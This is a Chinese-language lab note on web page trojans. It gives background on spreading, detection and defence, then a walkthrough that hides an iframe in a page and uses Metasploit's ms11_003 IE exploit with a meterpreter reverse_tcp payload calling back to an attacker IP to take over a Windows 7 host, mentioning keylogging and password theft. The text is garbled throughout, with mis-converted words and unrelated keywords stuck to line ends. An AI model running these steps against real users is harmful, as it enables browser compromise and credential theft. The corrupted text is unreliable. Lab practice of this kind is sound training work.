html⽹页挂马,浏览器安全之⽹页挂马实战——合天⽹安实验室
学习笔记
实验连接
⽹页挂马指的是把⼀个⽊马程序上传到⽹站⾥⾯,使得⽊马在打开⽹页时运⾏。⽹页挂马⽅式包括框架挂马、js⽂件挂马、body挂马、css 挂马、图⽚假装等。经过实验了解⽹页挂马相关知识,学会使⽤框架挂马并进⾏相关利⽤。css
实验简介
实验所属系列: Web安全web
实验对象: 本科/专科信息安全专业数据库
相关课程及专业: 计算机基础、HTML、Linuxapache
实验类别: 实践实验类vim
html主页预备知识
⽹页挂马简介windows
⽹页挂马指的是把⼀个⽊马程序上传到⼀个⽹站⾥⾯,⽽后⽤⽊马⽣成器⽣成⼀个⽹马,放到⽹页空间⾥⾯,再加代码使得⽊马在打开⽹页时运⾏。浏览器
⼯做原理安全
做为⽹页挂马的散布者,其⽬的是将⽊马下载到⽤户本地并进⼀步执⾏,当⽊马获得执⾏后,就意味着会有更多的⽊马被下载,且进⼀步被执⾏。这样就进⼊⼀个恶性的循环,从⽽使⽤户的电脑遭到攻击和控制。为达到⽬的⾸先要将⽊马下载到本地。服务器
常见⽅式
1)将⽊马假装为页⾯元素,⽊马则会被浏览器⾃动下载到本地。
2)利⽤脚本运⾏的漏洞下载⽊马。
3)利⽤脚本运⾏的漏洞释放隐含在⽹页脚本中的⽊马。
4)将⽊马假装成缺失的组件,或和缺失的组件捆绑在⼀块⼉,如flash播放插件。这样既达到了下载的⽬的,下载的组件⼜会被浏览器⾃动执⾏。
5)经过脚本运⾏调⽤某些com组件,利⽤其漏洞下载⽊马。
6)在渲染页⾯内容的过程当中,利⽤格式溢出释放⽊马,如ani格式溢出漏洞。
7)在渲染页⾯内容的过程当中,利⽤格式溢出下载⽊马,如flash9.0.115播放漏洞。
检测⽅式
1)特征匹配:将⽹页挂马的脚本按脚本病毒进⾏检测,可是⽹页脚本变形⽅式、加密⽅式⽐起传统的PE格式病毒更为多样,检测起来也更加困难。
2)主动防护:当浏览器要进⾏某些动做时,做出提⽰,以下载了某插件的安装包,会提⽰是否运⾏。好⽐浏览器建⽴暴风影⾳播放器时,提⽰是否容许运⾏,⼤多数状况下⽤户会点击是,⽹页⽊马会所以获得执⾏。
3)检查⽗进程是否为浏览器,这种⽅法很容易被躲过且会对不少插件形成误报。
防护措施
1)对开放上传附件功能的⽹站,必定要进⾏⾝份认证,并只容许信任的⼈使⽤上传程序。
2)保证所使⽤的程序及时地更新。
3)不要在前台⽹页加注后台管理程序登陆页⾯的连接。
4)时常备份数据库等⽂件,可是不要把备份数据放在程序默认的备份⽬录下。
5)管理员的⽤户名和密码要有必定复杂性。
6)IIS中禁⽌⽬录的写⼊和执⾏功能,能够有效防⽌asp⽊马。
7)在服务器、虚拟主机控制⾯板设置执⾏权限选项中,将有上传权限的⽬录取消asp的运⾏权限。
8)建⽴⼀个上传到⽹站根⽬录,Robots可以有效防范利⽤搜索引擎窃取信息的骇客。浏览器安全相关实验
浏览器使⽤安全
HTML5安全
实验⽬的
了解⽹页挂马相关知识,学会使⽤框架挂马,并进⾏相关利⽤。
实验环境
受害机:Windows七、ip:随机
攻击机:kali Linux、ip:10.1.1.101
实验步骤
步骤⼀
任务描述:学会使⽤框架挂马
kali机器的⽹站根⽬录为/var/www/html/,使⽤命令ls发现存在主页⽹址index.html:
使⽤gedit命令(或vim)打开index.html⽂件:
把下⾯这段代码插进index.html中:
(理论来讲插到任何地⽅都⾏,只要不把html语⾔弄乱了就⾏)
width、height设置为0,这样咱们就看不到⽹页的内容了。
插⼊iframe标签后的⽹页代码:
这⾥咱们选择将⽹马插⼊到body标签中。
步骤⼆
任务描述:利⽤ms11_003IE漏洞攻击win7主机
在kali中执⾏msfconsole,启动metasploit:
运⾏命令‘use exploit/windows/browser/ ms11_003_ie_css_import’,选择漏洞利⽤EXP:运⾏命令‘show options’,查看配置选项:
此处咱们须要设置SRVPORT、URIPATH与⽹马中的src⼀致。
执⾏命令:set SRVPORT 8060
执⾏命令:set URIPATH test.html
运⾏命令‘set payload windows/meterpreter/reverse_tcp’,设置攻击载荷进⾏回连:
运⾏命令‘show options’,查看配置选项,此时多了payload配置选项:
设置lhost以绑定本地ip:
命令:set lhost 10.1.1.101
运⾏命令‘run’,开始进⾏攻击:
步骤三
任务描述:模拟受害者访问含有⽊马的⽹页
⾸先在kali机器上执⾏service apache2 start,开启apache服务
在此处切换windows试验机:
Kali机器端能够看到受害机成功上线:
成功获取到会话记录:
Windows机器端关闭IE浏览器,kali机器在metepreter的监听端介⼊会话(Ctrl+C退出链接状态):
运⾏命令‘sessions–i 1’,选择介⼊ID号为1的当前受害机回连的会话:
输⼊sysinfo命令,查看靶机的相关信息:
接下来还能够进⾏键盘记录,查看⽬标的⽤户名和密码,进⽽远程登陆⽬标机器等操做。
最后执⾏关机:
⽬标死亡。
答题
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论